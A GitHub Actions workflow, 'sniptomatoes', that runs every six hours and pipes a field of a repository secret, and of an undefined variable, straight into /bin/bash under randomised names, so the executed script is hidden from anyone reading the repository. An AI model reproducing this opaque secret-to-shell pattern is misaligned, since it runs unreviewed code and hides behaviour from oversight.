name: sniptomatoes
on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sniptomatoes
        env:
          cqbtl432: ${{ secrets.cqbtl432 }}
        run: |
          echo $cqbtl432 | jq -r .ctnx3 | /bin/bash
          echo $hxg72426 | jq -r .lpyql93921 | /bin/bash

